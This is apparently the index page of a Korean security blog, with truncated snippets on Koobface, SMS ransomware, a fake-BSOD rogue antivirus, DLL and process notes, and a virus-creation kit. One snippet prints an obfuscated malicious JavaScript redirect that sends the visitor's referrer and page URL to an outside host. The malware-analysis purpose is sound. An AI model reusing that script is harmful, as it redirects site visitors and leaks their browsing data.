CoInzBlog

저작자를 위해 단순 링크만 남겨놓는다. #1 = http://hummingbird.tistory.com/400 #2 = http://hummingbird.tistory.com/403 이만.

TrendMicro 에서 Koobface 의 구조도가 발표되었다. 참고삼아 이미지를 긁어옴 (http://www.trendmicro.com/vinfo/images/blog/koobface_edited_big.gif) 그림을 보면 서로 별개라고 생각되었던 종류의 악성코드들이 연관되어 있다. PWS 기능의 악성 코드야 그렇다고 치고, 랜섬 기능까지 들어가 있다니;; 점점 더 기능업이 되어가는 것을 보면 사용자들에게 보안 의식을 요구하는 것 이상으로 보안 전문가의 책임이 커지는 것을 느낄 수 있다.

둘 다 OpenSSL 프로젝트 관련 모듈이다. libeay32.dll contains encryption functions which allow for coded communications over networks. This file is opensource and is used in many opensource programs to help with SSL communication ssleay32.dll is a module associated with The OpenSSL Toolkit from The OpenSSL Project, http://www.openssl.org/

해외 블로그 중에 http://blogs.zdnet.com 기사에서 랜섬웨어에 걸린 시스템에서 뿌려주는 이미지를 몇개 긁어왔다. 예전에 3년 전에 '랜섬웨어' 에 대해서 처음 얘기를 들을 때만 해도 파일들을 특정 Key로 암호화 해놓고, 사용자에게 돈을 요구하는 메시지를 남겨두는 그런 시나리오를 그저 이론 적으로만 이해를 하고 있었다. 이론이 있으면 행동으로 옮기고자 하는 사람도 나타나는 법... 그러나, 이론과 실제는 언제나 다르다. 최근의 랜섬웨어의 경우 금전적인 목적은 동일하나, 파일 암호화가 없이 단순히 사용자의 시스템 이용을 차단하는 방법 + 그리고, 돈 입금과 같이 물리적인 제약이 따르는 방식이 아닌 유료 SMS 와 같은 것을 통해 즉시, 그 자리에서 이익이 발생하는 방법을 이용한다고 한다. ..

오늘 해외 블로그를 모니터링 하다가 깜놀 순간이 있었다. 인터넷 익스플로러 (이하 IE) 의 화면에 BSOD 를 넣을 줄이야;; 정말 그 발상 자체가 놀라울 다름이다. 전에 탐색기 화면에 보여주던 것이 더 효과적이라고 생각을 하는데;; 설마 이런 데에 속는 사용자가 있을까 의문이 든다 ㅋㅋ 뭐 과정이야 어쨋든 SystemSecurity 는 {드라이브}:\Document and Settings\All Users\Application Data\{랜덤이름}\{랜덤이름}.exe 의 형태를 갖는 것은 여전하니까. 이 녀석을 지우면 된다. 다만 최근의 변형 중에는 explorer.exe, iexplorer.exe 이외의 프로세스를 모두 종료시키는 증상도 확인된 바 있으니 AV 업체의 전용 백신으로 치료해야 할 수도..

Hash MD5 : 2c0aab20682bfa914de33cc3d66c6116 [ String 정보 ] // ----- PsaSrv psadd // ----- [ 설치 정보 ] C:\WINDOWS\system32\PsaSrv.exe [ 시작 정보 ] Services 에 등록되어 시작된다. O23 - Service: IBM PSA Access Driver Control (PsaSrv) - Unknown owner - C:\WINDOWS\system32\PsaSrv.exe

Hash MD5 : 7E979E56A7AC66CAD01E5302AF3D8A6E [ 내부 String 데이터 ] // --------------------------------------------- \PkgMgr.exe _tpiu000.exe _tpiu000.exe,100 IBMTPI.xml PkgMgr.exe PkgMgr.tpi ThinkPadSoftwareInstaller TpiFlash.dll tpiliba.dll tpilibb.dll TPINTDEV.sys TpiSetup.dat TpiSetup.dll TpiSetup.ini TpiSetup.xml TPISYSID.sys TPISYSID.vxd {D1A4DEBD-C2EE-449f-B9FB-E8409F9A0BC5} SOFTWARE\IBM\ThinkP..

파일 경로 : %PFIDR% \ Common Files \ Microsoft Shared \ Source Engine \ OSE.exe 파일 명 : OSE (Microsoft Office Source Engine) 관련 파일 셋 : Micro Office Suite 설명 : MS 오피스 구성 컴포넌트의 추가적인 설치를 위한 'Microsoft Office Suite' 에 포함된 프로세스, 안정성과 보안을 위해서 항상 켜놓으라고 하는 것을 보면 Office 관련 보안 업데 ose.exe is a process belonging to the Microsoft Office Suite which adds additional installation support during CD install and web up..

아래와 같은 악성 스크립트가 있다. function s(rt) { eval(unescape("uj%3Ddocument%3Bt%3D0%3Bvar1%3D5423%3Bvar2%3Dvar1%3Bv%3D%27mm.cn%27%3Bif%28var1%3D%3Dvar2%29document.location%3D%27http%3A%2F%2F491%27%2Bv%2B%27%2Fst%2F%3Fds%3D%27%2Brt%2B%27%26tm%3D%27%2Bt%2B%27%26pe%3D%27%2Bescape%28uj.referrer%29%2B%27%26oi%3D%27%2Bescape%28window.location.href%29%3B")); } AV 업체들의 진단은 아래와 같다. Comodo Exploit.JS.Redirect.~N Au..

오늘은 재미있는 기사가 많다. 역시나 해외 블로그를 돌아다니 던 중에 재미있는 기사가 있어서 메모를 남긴다. 참고 블로그는 http://blog.spywareguide.com/atom.xml 주요 내용은 이렇다. There's a rather meaty virus creation program currently doing the rounds that offers pretty much every kind of "let's break stuff" option you could think of. To the uninitiated, it looks like the world's greatest virus creation tool. Antivirus slaughter, Delete My Documents, Sen..